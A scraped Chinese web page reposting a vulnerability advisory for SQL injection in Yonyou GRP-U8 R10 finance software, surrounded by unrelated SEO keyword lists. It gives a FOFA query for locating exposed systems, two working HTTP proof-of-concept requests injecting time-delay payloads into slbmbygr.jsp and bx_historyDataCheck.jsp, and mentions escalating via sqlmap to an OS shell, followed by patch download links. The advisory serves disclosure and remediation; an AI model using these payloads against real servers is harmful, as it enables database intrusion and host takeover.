当前位置: 首页 > news >正文

延吉市网站建设无安全警告的浏览器

延吉市网站建设,无安全警告的浏览器,h5网站建设方案.doc,未备案网站通知0x01 产品简介 用友GRP-U8R10行政事业财务管理软件是用友公司专注于国家电子政务事业#xff0c;基于云计算技术所推出的新一代产品#xff0c;是我国行政事业财务领域最专业的政府财务管理软件。 0x02 漏洞概述 用友GRP-U8的bx_historyDataCheck jsp、slbmbygr.jsp等接口存…0x01 产品简介 用友GRP-U8R10行政事业财务管理软件是用友公司专注于国家电子政务事业基于云计算技术所推出的新一代产品是我国行政事业财务领域最专业的政府财务管理软件。 0x02 漏洞概述 用友GRP-U8的bx_historyDataCheck jsp、slbmbygr.jsp等接口存在SQL注入漏洞由于用友GRP-U8未对用户的输入进行有效的过滤直接将其拼接进了SQL查询语句中导致系统出现SQL注入漏洞进一步利用可造成主机失陷。 0x03 影响范围 用友GRP-U8R10 U8Manager B、C、G 系列产品 20230905 0x04 复现环境 FOFAapp用友-GRP-U8 0x05 漏洞复现 PoC-1 GET /u8qx/slbmbygr.jsp?gsdm1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: your-ip 延时5秒 Sqlmap验证 PoC-2 POST /u8qx/bx_historyDataCheck.jsp HTTP/1.1 Host: your-ip Content-Type: application/x-www-form-urlencodeduserName;WAITFOR DELAY 0:0:6--class.module.classLoader.DefaultAssertionStatus 延时6秒 利用os-shell命令执行 0x06 修复建议 目前官方已发布更新补丁获取安全补丁方式如下 1. 百度云盘https://pan.baidu.com/s/1cQIxlUkpYAxE508EXjgQxA 提取码n1xy 2. 用友云盘https://pan.yonyou.com/s/gUWlv8QkSsY密码a61h 下载【20230905-关于用友GRP-U8 bx_historyDataCheck jsp存在SQL注入漏洞的解决方案.zip】 更新用友GRP-U8 Manager产品的2023年10月份日期大于等于均可标准补丁也可以修复此问题。
http://www.sadfv.cn/news/258791/

相关文章:

  • 青岛有没有专门做淘宝网站深圳企业注销一窗通
  • 电子商务网站建设与维护展望wordpress推荐
  • 建设银行扬中网站微信营销的方法7种
  • 上海专业网站建设买了云服务器怎么做网站
  • 网站建设兼职薪酬怎么样怎么在网上做广告
  • 中英文网站模板下载wordpress添加媒体
  • 个人网站不能有盈利性质wordpress博客批量发布
  • 兰州手机网站wordpress 游戏网页
  • 重庆市工程建设招投标交易中心网站专业设计网站公司
  • 做体育类网站素材沈阳专业网站制作
  • ac68u做网站网站排名软件网址
  • 新的东莞网站制作公司百度一下官网网址
  • 买奢侈品代工厂做的产品的网站山东省两学一做网站
  • 怎么做网站的产品分析外贸网站建设怎么建设
  • 如何让百度口碑收录自己的网站企业营销策划实训
  • 网站建设的编程阿里云万网建网站
  • 焦作 做 网站一个app多少钱
  • 仿99健康网网站源码自学网页设计需要学习什么
  • 网站开发一个模板费用wordpress搬瓦工
  • 做技术开发的网站WordPress修改网站背景
  • 利用渗透的网站做寄生虫工厂网站建设费用
  • 企业网站怎么制作网站建设毕业实践设计报告
  • 佛山做网站的公司有哪些招聘网站开发的公司
  • 聊城app制作网站怎样做推广
  • 温州市建设质量监督站网站c 做网站
  • cdn如何做网站备案网站开发+职位描述
  • asp.net网站开发与项目实战网站建设盈利模式
  • 网站用什么格式的图片格式seo推广软件代理
  • 黄石网站设计制作wordpress安装地图代码
  • 公司支付网站款做凭证拼团购物网站怎么做